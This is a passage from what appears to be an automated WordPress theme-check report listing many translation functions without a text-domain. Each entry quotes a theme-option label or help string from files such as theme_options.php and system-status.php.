arguments 'Error: %s' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Status code: %s' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Remote Get' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'theme and many plugins uses this method to communicate with different APIs, e.g. Google, Twitter, Facebook, Paypal.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'wp_remote_get() failed. The WooCommerce plugin updater won\'t work with your server. Contact your hosting provider.' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Error: %s' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Status code: %s' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Active Plugins' in file system-status.php.Found a translation function that is missing a text-domain. Function esc_attr__, with the arguments 'Visit plugin homepage' in file system-status.php.Found a translation function that is missing a text-domain. Function _x, with the arguments '%s is available', 'Version info' in file system-status.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Network enabled' in file system-status.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'by %s', 'by author' in file system-status.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Attention: Any modifications made to the Theme Files will be lost when updating. If you did change any files (Custom CSS rules or PHP file modifications for example) make sure to create a theme backup.' in file addons.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'theme' in file addons.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Review Overview' in file review-system.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Customize &#8220;%s&#8221;' in file theme_options.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Current theme preview' in file theme_options.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Current theme preview' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'By %s' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Version %s' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tags' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'This <a href="%1$s">child theme</a> requires its parent theme, %2$s.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'http://codex.wordpress.org/Child_Themes' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'General Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select theme style full-width or fixed width' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Theme Style' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select main layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'just work when each sidebar on a different side' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Both sidebars in same width' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Change date format click <a href="http://codex.wordpress.org/Formatting_Date_and_Time">here</a> to see hwo to change it' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Date Format' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Enable or disable responsive' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Enable Responsive' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Enable or disable responsive' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Desktop/mobile links in footer' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'in mobiles only' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show secondary sidebar on low resolution screens ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Enable or disable breadcrumb' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Breadcrumb' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'if enable this the images will fade in if it visible in viewbort' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'fade in images' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'if enable this you will see the post format icons on posts in Newsboxes, Categories and blog' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post format icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Enable or disable Scroll to top button' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Scroll to top button' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'upload your favicon' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'favicon' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Apple Touch icon' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'This icon used for iOS system if user add your site to home page size must be 152x152' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Default Avatar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'you will see this if user don\'t have gravatar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'upload your custom default avatar and select it from settings -> Discussion' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'it can be google analytics or any Script code, it will be add before closing of body tag' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Footer scripts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'We not recommend adding scripts in header for page speed purpose, but if you need to do this add your scripts hear ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header scripts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Social counter widget cache timeout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'in seconds ex: 1 hour = 60*60 = 3600 ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Home Page' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Build your home page' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Video tutorial <a target="_blank" href="http://www.momizat.com/theme/goodnews/documentation/#tab-1402173051220-8-10">here</a>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Social Networks' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom Social Icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'need more? add your custom' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'name' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'URL' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'This will apply for all Categories, if you leave it as none it will be same as the main layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Categories Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this settings control in category page in general, you can overwrite this settings from each category edit page.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category Feature Slider' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'by enable this you will see feature slider on each category page' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Slider Posts orderby ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'it can be recent, popular, random or specific tag.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Recent Posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Popular Posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Number of posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '-1 for show all posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Timeout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'time between each slide with ms' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Slider animation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'transition between each slide.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Animation speed' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Animation speed with ms' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Caption style' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'slider caption style.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'navigation style' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'slider caption style.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Posts Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Grid Columns' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Share Icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'enable social share icons for each post, maybe cause some slowdown' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category RSS' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'by enable this you will see small rss icon in the category breadcrumb by clicking on it you can see the category rss feed' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide posts from child categories' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'if you enabled this option you will do not see child categories posts in the parent category page' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Sidebars' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'categories sidebars options' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Force posts to display category sidebar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Yes, mean your posts will display their parent category sidebars if posts not have a custom sidebars' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Ads' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this will be display between category posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select Ad:' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Display after x posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the number of posts to display ads after it. default is 3' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Repeat ad' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'display the ad again after x posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this settings control in all posts in general, you can overwrite this settings from each Post, note: most of this options works in single post only.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'This will apply for all posts, if you leave it as none it will be same as the main layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Posts Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'if you enable this, the post automatically use the first image in the post as feature image, if you don\'t upload feature image' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Use first image as feature image' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Default post image' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this option to upload default image for post that do not have feature image.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show full Post' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this option works only in blog and category, default is show excerpt or some text from the content, by enable this you can see the full post unless you use < !-- more -- > tag .' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post feature area' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post feature area position' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tags' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post Share icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post Share icons on top of Article' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Next and previous post' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Author box' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Related posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Related posts by' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tag' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Related Posts count' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Disable comments' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Completely disable post comments' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Threaded Comments Numbering' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Auto play video posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Facebook videos don not allow this function' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Open all images links in lightbox' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Disable lightbox in wordpress gallery' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post Meta' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Author' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Date' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tags' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Comments' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post tools' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'print and email icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post Share buttons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Facebook' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Twitter' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Google+' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Linkedin' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Pinterest' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Vk' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post custom Sidebars' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this will be apply for all posts, you can customize it for each post ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Post Ads' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Top ad' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Content bottom ad' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Bottom ad' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Author page Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Author Page Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this settings control in Author page, each author can overwrite this settings from author settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'default author background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'author background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Posts Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Number of Author posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Page Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this settings control in Search page.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'page layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Page breadcrmbs' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Advanced Search' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'advanced search give you ability to filter your search results with various ways' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Number of Posts per page' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Portfolio' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Portfolio items Slug' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Default is portfolio_item' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'bbPress settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select main layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Woocommerce settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '-1 for all products' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Number of products per page' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Cart In navigation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Show cart in woocommerce pages only' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'if select no, the cart will display in whole site ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Product settings' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Product layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Elements' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'theme elements' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Top Banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Top banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'On top' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Under the menu' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Position' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Top banner Content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select Top banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom Content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'You can use HTML or shortcodes here' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Close button' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Customize' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text Color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Links Color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Close button color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Topbar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Topbar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'top navigation left content if select menu you must set it in appearance -> menus the menu location is "Top Menu"' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Menu' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Social Icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Box' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom Content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Left Content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'top navigation Right content if select menu you must set it in appearance -> menus the menu location is "Top Menu"' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Social Icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Box' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Menu' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Right Content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Logo type' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'set logo type' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'upload custom logo' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The logo' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'retina logo must be your logo in double size if original logo is 150*70 retina logo must be 300*140' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Retina Logo' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'your original logo width which you upload under "the logo"' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Original logo width' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'your original logo Height which you upload under "the logo"' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Original logo Height' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'if leave blank it will be the site name' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text logo' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'set the header height' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'header Height' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'enable/disable the header ad banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The content beside the logo' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select Header banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'it can be text,html or shortcodes' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom content space from top' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Context' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Center' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Logo Position' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Context mean left if your website direction LTR and Right if RTL' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'enable/disable search in navigation bar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Login Form' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'enable/disable login in navigation bar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Register Page Link' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Lost password Page link' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Shadow' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'change/disable Navigation shadow' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Sticky Navigation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this logo will appear beside the navigation menu in the sticky navigation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Sticky navigation logo' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation Social icon' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'show/hide social icon in navigation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'highlight top level items' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'highlight top level menu items if open page/post from any item under it under it' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Dropdown Animation ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Fade' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Slide' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Skew' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'News Ticker' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'News Ticker' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'enable/disable News Ticker' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Animation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Scroll from right to left' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Up and down' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Static - no animation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Timeout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The time between each news in ms' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Title' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'BREAKING NEWS' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Display' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'latest posts, specific category or specific tag, custom text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Latest Posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Popular Posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tag' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select Category' in file 